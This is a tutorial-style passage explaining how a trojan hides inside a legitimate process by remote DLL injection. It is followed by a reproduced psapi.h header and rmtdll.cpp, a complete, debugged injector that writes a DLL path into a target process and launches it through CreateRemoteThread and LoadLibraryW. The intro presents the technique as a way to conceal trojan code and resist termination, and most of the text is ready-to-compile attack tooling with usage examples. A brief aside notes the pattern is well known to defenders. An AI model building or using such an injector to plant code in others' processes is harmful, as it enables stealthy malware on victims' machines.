A trojan that runs as its own visible process is easy for the user to notice. Remote injection is used to hide it inside another process: either start the trojan DLL in the target with a remote thread, or copy a piece of code into the target's address space in advance and then start that code with a remote thread. Whichever method is used, the core code of the trojan runs in the memory space of some other process, which both conceals it and makes it harder to terminate. At that point the trojan has not merely gained a foothold on the machine; it is living inside a legitimate user process. (From a defender's standpoint this classic CreateRemoteThread-plus-LoadLibrary pattern is well understood: a thread created from one process into another whose start address is LoadLibraryW is a standard detection signal, so the program below should be read as a demonstration of the mechanism, not as a stealthy technique.)
psapi.h
/*
 * psapi.h - declarations for the Process Status API (PSAPI.DLL).
 *
 * Reproduced here so the injector below can build without the Platform SDK
 * header.  rmtdll.cpp only uses EnumProcesses(), EnumProcessModules() and
 * GetModuleBaseName() (to map an image name to a PID); the rest is included
 * for completeness.
 *
 * Common conventions in this API, visible in the prototypes below:
 *   - "cb" parameters are sizes in BYTES, not element counts; the caller
 *     passes sizeof(array) and divides the returned byte count to get the
 *     number of elements (rmtdll.cpp does cbNeeded / sizeof(DWORD)).
 *   - "lpcbNeeded"/"cbNeeded" receives the number of bytes actually written.
 *     NOTE(review): if that equals the buffer size the list may have been
 *     truncated; callers that must see every entry should retry with a larger
 *     buffer.  Nothing in this header says so explicitly - confirm against
 *     the SDK documentation.
 *   - A/W pairs are selected by the UNICODE macro; code that passes a char
 *     buffer should call the ...A name explicitly rather than the macro.
 */
#ifndef _PSAPI_H_
#define _PSAPI_H_

#if _MSC_VER > 1000
#pragma once
#endif

#ifdef __cplusplus
extern "C" {
#endif

/* Fill lpidProcess with the PIDs of running processes (cb = buffer size in
 * bytes; *cbNeeded = bytes written).  Returns FALSE on failure. */
BOOL
WINAPI
EnumProcesses(
    DWORD * lpidProcess,
    DWORD cb,
    DWORD * cbNeeded
    );

/* Fill lphModule with the module handles loaded in hProcess.  Passing a
 * single HMODULE (cb = sizeof(HMODULE)) yields just the first module, which
 * rmtdll.cpp relies on to obtain the main executable.
 * NOTE(review): presumably fails across 32/64-bit boundaries (a 32-bit
 * caller enumerating a 64-bit process) - verify before depending on it. */
BOOL
WINAPI
EnumProcessModules(
    HANDLE hProcess,
    HMODULE *lphModule,
    DWORD cb,
    LPDWORD lpcbNeeded
    );

/* Base name (file name without directory) of hModule in hProcess.
 * Returns the length copied; 0 on failure. */
DWORD
WINAPI
GetModuleBaseNameA(
    HANDLE hProcess,
    HMODULE hModule,
    LPSTR lpBaseName,
    DWORD nSize
    );

DWORD
WINAPI
GetModuleBaseNameW(
    HANDLE hProcess,
    HMODULE hModule,
    LPWSTR lpBaseName,
    DWORD nSize
    );
#ifdef UNICODE
#define GetModuleBaseName GetModuleBaseNameW
#else
#define GetModuleBaseName GetModuleBaseNameA
#endif // !UNICODE

/* Full path of hModule in hProcess. */
DWORD
WINAPI
GetModuleFileNameExA(
    HANDLE hProcess,
    HMODULE hModule,
    LPSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetModuleFileNameExW(
    HANDLE hProcess,
    HMODULE hModule,
    LPWSTR lpFilename,
    DWORD nSize
    );
#ifdef UNICODE
#define GetModuleFileNameEx GetModuleFileNameExW
#else
#define GetModuleFileNameEx GetModuleFileNameExA
#endif // !UNICODE

/* Load address, image size and entry point of a module in another process. */
typedef struct _MODULEINFO {
    LPVOID lpBaseOfDll;
    DWORD SizeOfImage;
    LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;

BOOL
WINAPI
GetModuleInformation(
    HANDLE hProcess,
    HMODULE hModule,
    LPMODULEINFO lpmodinfo,
    DWORD cb
    );

/* Working-set management / observation. */
BOOL
WINAPI
EmptyWorkingSet(
    HANDLE hProcess
    );

BOOL
WINAPI
QueryWorkingSet(
    HANDLE hProcess,
    PVOID pv,
    DWORD cb
    );

BOOL
WINAPI
InitializeProcessForWsWatch(
    HANDLE hProcess
    );

/* One recorded page fault: the faulting instruction and the faulting address. */
typedef struct _PSAPI_WS_WATCH_INFORMATION {
    LPVOID FaultingPc;
    LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;

BOOL
WINAPI
GetWsChanges(
    HANDLE hProcess,
    PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
    DWORD cb
    );

/* Name of the file backing the memory-mapped region containing lpv. */
DWORD
WINAPI
GetMappedFileNameW(
    HANDLE hProcess,
    LPVOID lpv,
    LPWSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetMappedFileNameA(
    HANDLE hProcess,
    LPVOID lpv,
    LPSTR lpFilename,
    DWORD nSize
    );
#ifdef UNICODE
#define GetMappedFileName GetMappedFileNameW
#else
#define GetMappedFileName GetMappedFileNameA
#endif // !UNICODE

/* Kernel-mode driver enumeration: lpImageBase receives load addresses. */
BOOL
WINAPI
EnumDeviceDrivers(
    LPVOID *lpImageBase,
    DWORD cb,
    LPDWORD lpcbNeeded
    );

DWORD
WINAPI
GetDeviceDriverBaseNameA(
    LPVOID ImageBase,
    LPSTR lpBaseName,
    DWORD nSize
    );

DWORD
WINAPI
GetDeviceDriverBaseNameW(
    LPVOID ImageBase,
    LPWSTR lpBaseName,
    DWORD nSize
    );
#ifdef UNICODE
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
#endif // !UNICODE

DWORD
WINAPI
GetDeviceDriverFileNameA(
    LPVOID ImageBase,
    LPSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetDeviceDriverFileNameW(
    LPVOID ImageBase,
    LPWSTR lpFilename,
    DWORD nSize
    );
#ifdef UNICODE
#define GetDeviceDriverFileName GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName GetDeviceDriverFileNameA
#endif // !UNICODE

// Structure for GetProcessMemoryInfo()
// The first field, cb, carries the structure size; callers are expected to
// set it (and pass the same value as the cb argument) so the DLL can tell
// which version of the structure it was given.

typedef struct _PROCESS_MEMORY_COUNTERS {
    DWORD cb;
    DWORD PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;
typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;

/* Windows XP (0x0501) and later: same layout plus PrivateUsage appended. */
#if (_WIN32_WINNT >= 0x0501)
typedef struct _PROCESS_MEMORY_COUNTERS_EX {
    DWORD cb;
    DWORD PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivateUsage;
} PROCESS_MEMORY_COUNTERS_EX;
typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;
#endif

BOOL
WINAPI
GetProcessMemoryInfo(
    HANDLE Process,
    PPROCESS_MEMORY_COUNTERS ppsmemCounters,
    DWORD cb
    );

/* System-wide memory / object counters.
 * NOTE(review): "PERFORMACE" is misspelled, but it is the name this header
 * declares and the one GetPerformanceInfo() takes - use it as spelled. */
typedef struct _PERFORMACE_INFORMATION {
    DWORD cb;
    SIZE_T CommitTotal;
    SIZE_T CommitLimit;
    SIZE_T CommitPeak;
    SIZE_T PhysicalTotal;
    SIZE_T PhysicalAvailable;
    SIZE_T SystemCache;
    SIZE_T KernelTotal;
    SIZE_T KernelPaged;
    SIZE_T KernelNonpaged;
    SIZE_T PageSize;
    DWORD HandleCount;
    DWORD ProcessCount;
    DWORD ThreadCount;
} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;

BOOL
WINAPI
GetPerformanceInfo (
    PPERFORMACE_INFORMATION pPerformanceInformation,
    DWORD cb
    );

/* Page-file enumeration: one callback invocation per page file. */
typedef struct _ENUM_PAGE_FILE_INFORMATION {
    DWORD cb;
    DWORD Reserved;
    SIZE_T TotalSize;
    SIZE_T TotalInUse;
    SIZE_T PeakUsage;
} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;

typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);

BOOL
WINAPI
EnumPageFilesW (
    PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,
    LPVOID pContext
    );

BOOL
WINAPI
EnumPageFilesA (
    PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,
    LPVOID pContext
    );
#ifdef UNICODE
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW
#define EnumPageFiles EnumPageFilesW
#else
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA
#define EnumPageFiles EnumPageFilesA
#endif // !UNICODE

/* Image file name of hProcess. */
DWORD
WINAPI
GetProcessImageFileNameA(
    HANDLE hProcess,
    LPSTR lpImageFileName,
    DWORD nSize
    );

DWORD
WINAPI
GetProcessImageFileNameW(
    HANDLE hProcess,
    LPWSTR lpImageFileName,
    DWORD nSize
    );
#ifdef UNICODE
#define GetProcessImageFileName GetProcessImageFileNameW
#else
#define GetProcessImageFileName GetProcessImageFileNameA
#endif // !UNICODE

#ifdef __cplusplus
}
#endif

#endif
rmtdll.cpp
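#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include "psapi.h"

/*
 * rmtdll.cpp - inject a DLL into another process.
 *
 *   rmtdll.exe <PID | image name> <dll path>
 *
 * Mechanism (the classic CreateRemoteThread / LoadLibraryW injection):
 *   1. resolve the target (a PID, or the first process whose image name
 *      matches), and turn the DLL argument into an absolute path;
 *   2. open the target with the rights CreateRemoteThread needs;
 *   3. VirtualAllocEx + WriteProcessMemory the wide-char DLL path into the
 *      target's address space;
 *   4. CreateRemoteThread in the target with LoadLibraryW as the start
 *      routine and the remote string as its argument, then wait for it.
 *
 * Assumptions a reader should be aware of:
 *   - kernel32.dll is assumed to be mapped at the same base in the target as
 *     in this process, so the local address of LoadLibraryW is valid there.
 *     That also means injector and target must have the same bitness.
 *   - No SeDebugPrivilege is enabled here, so targets owned by other users or
 *     running elevated are expected to fail at OpenProcess (access denied).
 *   - The DLL path is resolved by the TARGET's LoadLibraryW, which is why a
 *     relative argument is made absolute before it is copied over.
 *
 * Fixes relative to the original listing: the absolute-path branch copied in
 * the wrong direction (strncpy(argv[2], lpDllFullPathName, ...)), the file
 * opened by _lopen() was never closed, the CreateRemoteThread result was not
 * the value being checked, the process handle was leaked (the thread handle
 * was closed twice instead), ProcessToPID() leaked one process handle per
 * non-matching process, a stray printf("%s...") had no argument, and every
 * error path exited with status 0.
 */

DWORD ProcessToPID(char *);
void  CheckError(INT, INT, char *);
void  Usage(char *);

/* State shared with CheckError()/Fail() so a failure anywhere can release
 * whatever has been acquired so far. */
HANDLE hRemoteThread     = NULL;
HANDLE hRemoteProcess    = NULL;
DWORD  dwRemoteProcessId = 0;
PWSTR  pszLibFileRemote  = NULL;   /* lives in the TARGET's address space */

/* Release every handle / remote allocation currently held.  Safe to call
 * more than once: each resource is NULLed after it is released. */
static void Cleanup(void)
{
    if (pszLibFileRemote != NULL && hRemoteProcess != NULL) {
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
        pszLibFileRemote = NULL;
    }
    if (hRemoteThread != NULL) {
        CloseHandle(hRemoteThread);
        hRemoteThread = NULL;
    }
    if (hRemoteProcess != NULL) {
        CloseHandle(hRemoteProcess);
        hRemoteProcess = NULL;
    }
}

/* Report `what` together with GetLastError(), release everything and exit
 * with a non-zero status (the original exited with 0 on every error). */
static void Fail(const char *what)
{
    DWORD err = GetLastError();   /* read before Cleanup() can overwrite it */
    printf("%s error: %lu\n", what, (unsigned long)err);
    Cleanup();
    exit(EXIT_FAILURE);
}

/* Build the absolute DLL path in `out` (capacity `cap` bytes).
 * An argument containing ":\" or starting with "\\" (UNC) is taken as already
 * absolute; anything else is appended to the current directory.
 * Returns FALSE if GetCurrentDirectory fails or the result would not fit,
 * so the caller never continues with a truncated path. */
static BOOL BuildDllPath(const char *arg, char *out, size_t cap)
{
    size_t argLen = strlen(arg);

    if (strstr(arg, ":\\") != NULL || (arg[0] == '\\' && arg[1] == '\\')) {
        if (argLen + 1 > cap)
            return FALSE;
        memcpy(out, arg, argLen + 1);
        return TRUE;
    }

    /* Returns the length written, or the size REQUIRED when cap is too
     * small, or 0 on failure - so anything >= cap means "did not fit". */
    DWORD dirLen = GetCurrentDirectoryA((DWORD)cap, out);
    if (dirLen == 0 || dirLen >= cap)
        return FALSE;
    if ((size_t)dirLen + 1 + argLen + 1 > cap)   /* dir + '\' + arg + NUL */
        return FALSE;
    out[dirLen] = '\\';
    memcpy(out + dirLen + 1, arg, argLen + 1);
    printf("Convert DLL filename to fullpathname:\n%s\n", out);
    return TRUE;
}

int main(int argc, char **argv)
{
    char  lpDllFullPathName[MAX_PATH];
    WCHAR pszLibFileName[MAX_PATH] = { 0 };

    if (argc != 3)
        Usage("parametes number incorrect!");   /* does not return */

    /* argv[1] is a PID if it starts with a digit, otherwise an image name. */
    if (isdigit((unsigned char)*argv[1])) {
        char *end = NULL;
        unsigned long pid = strtoul(argv[1], &end, 10);
        if (*end != '\0')
            Usage("PID is not a number!");     /* atoi() silently accepted "12abc" */
        dwRemoteProcessId = (DWORD)pid;
    } else {
        dwRemoteProcessId = ProcessToPID(argv[1]);
    }
    if (dwRemoteProcessId == 0) {
        /* Previously fell through to OpenProcess(..., 0) and a confusing error. */
        printf("process not found: %s\n", argv[1]);
        return EXIT_FAILURE;
    }

    if (!BuildDllPath(argv[2], lpDllFullPathName, sizeof lpDllFullPathName))
        Fail("DLL path (too long, or GetCurrentDirectory failed)");

    /* Existence check from this side before touching the other process.
     * (Replaces _lopen(), whose handle was never closed.) */
    if (GetFileAttributesA(lpDllFullPathName) == INVALID_FILE_ATTRIBUTES)
        Fail("DLL file Not Exist");

    /* -1: convert the terminator too, so the string copied into the target
     * is NUL-terminated even when the path is MAX_PATH-1 characters long. */
    if (MultiByteToWideChar(CP_ACP, 0, lpDllFullPathName, -1,
                            pszLibFileName, MAX_PATH) == 0)
        Fail("MultiByteToWideChar");

    wprintf(L"will inject %s", pszLibFileName);   /* MSVC wprintf: %s is a wide string */
    printf("target process: %s pid = %lu\n", argv[1], (unsigned long)dwRemoteProcessId);

    /* Rights required by VirtualAllocEx/WriteProcessMemory/CreateRemoteThread.
     * QUERY_INFORMATION and VM_READ were missing in the original set. */
    hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                                 PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                                 FALSE, dwRemoteProcessId);
    if (hRemoteProcess == NULL)
        Fail("remote process not exist or access denide!");

    /* Copy the DLL path into the target; it becomes LoadLibraryW's argument. */
    SIZE_T cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
    pszLibFileRemote = (PWSTR)VirtualAllocEx(hRemoteProcess, NULL, cb,
                                             MEM_COMMIT, PAGE_READWRITE);
    if (pszLibFileRemote == NULL)
        Fail("VirtualAllocEx");
    if (!WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibFileName, cb, NULL))
        Fail("WriteProcessMemory");

    /* Local address of LoadLibraryW, used as the remote start routine (see
     * the same-kernel32-base assumption in the file header). */
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
    if (pfnStartAddr == NULL)
        Fail("GetProcAddress");

    hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr,
                                       pszLibFileRemote, 0, NULL);
    if (hRemoteThread == NULL)            /* original re-checked pfnStartAddr here */
        Fail("Create remote thread");

    /* Blocks until the DLL's DllMain has returned; a DllMain that never
     * returns hangs this program. */
    WaitForSingleObject(hRemoteThread, INFINITE);

    /* The thread's exit code is LoadLibraryW's return value (the HMODULE,
     * truncated to a DWORD); 0 means the load failed inside the target. */
    DWORD dwExit = 0;
    if (!GetExitCodeThread(hRemoteThread, &dwExit) || dwExit == 0)
        Fail("LoadLibraryW failed inside target");

    Cleanup();   /* frees the remote string, closes thread AND process handles */
    return EXIT_SUCCESS;
}

/* Map an image name (e.g. "notepad.exe") to a PID.
 * Compares, case-insensitively, against the base name of each process's
 * first module (its main executable).  Returns the first match in
 * enumeration order, or 0 if nothing matches or EnumProcesses fails.
 * Processes that cannot be opened (System, protected, other users) are
 * skipped silently - they could not be injected into anyway. */
DWORD ProcessToPID(char *inputProcessName)
{
    DWORD        aProcess[1024], cbNeeded = 0, cProcesses;
    unsigned int i;

    /* aProcess[] receives live PIDs; cbNeeded is the byte count filled in. */
    if (!EnumProcesses(aProcess, sizeof(aProcess), &cbNeeded))
        return 0;
    /* NOTE(review): if cbNeeded == sizeof(aProcess) the list was probably
     * truncated (more than 1024 processes) and the remainder is not searched. */
    cProcesses = cbNeeded / sizeof(DWORD);

    for (i = 0; i < cProcesses; i++) {
        char    szProcessName[MAX_PATH] = "unkonwnprocess";
        HMODULE hMod  = NULL;
        DWORD   cbMod = 0;
        DWORD   found = 0;
        HANDLE  hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                       FALSE, aProcess[i]);

        if (hProcess == NULL)
            continue;

        /* First module = main executable.  GetModuleBaseNameA is called
         * explicitly because szProcessName is a char buffer; the UNICODE
         * macro would otherwise select the wide variant. */
        if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbMod) &&
            GetModuleBaseNameA(hProcess, hMod, szProcessName, sizeof(szProcessName)) != 0 &&
            _stricmp(szProcessName, inputProcessName) == 0)
            found = aProcess[i];

        CloseHandle(hProcess);   /* original only closed this on a match */
        if (found != 0)
            return found;
    }
    return 0;
}

/* Error handling function: if iReturnCode equals iErrorCode, print
 * pErrorMsg with GetLastError(), release everything and exit non-zero.
 * Kept for the original call pattern; new code calls Fail() directly
 * rather than squeezing handles/pointers through an INT. */
void CheckError(INT iReturnCode, INT iErrorCode, char *pErrorMsg)
{
    if (iReturnCode == iErrorCode)
        Fail(pErrorMsg);
}

/* Print pErrorMsg followed by the usage text, then exit.  Only ever called
 * on bad arguments, so the status is non-zero. */
void Usage(char *pErrorMsg)
{
    printf("%s\n", pErrorMsg);
    printf("\t\tremote process DLL by liangshuai\n");
    printf("\tThis program can inject a DLL into remote process\n");
    printf("Email:\n");
    printf("\tshuai52@126.com\n");
    printf("Usage:\n");
    printf("\trmtdll.exe PID [| processname] dllfullpathname\n");
    printf("Example:\n");
    printf("\trmtdll.exe 1024 C:\\windows\\system32\\mydll.dll\n");
    printf("\trmtdll.exe erer.exe C:\\mydll.dll\n");
    exit(EXIT_FAILURE);
}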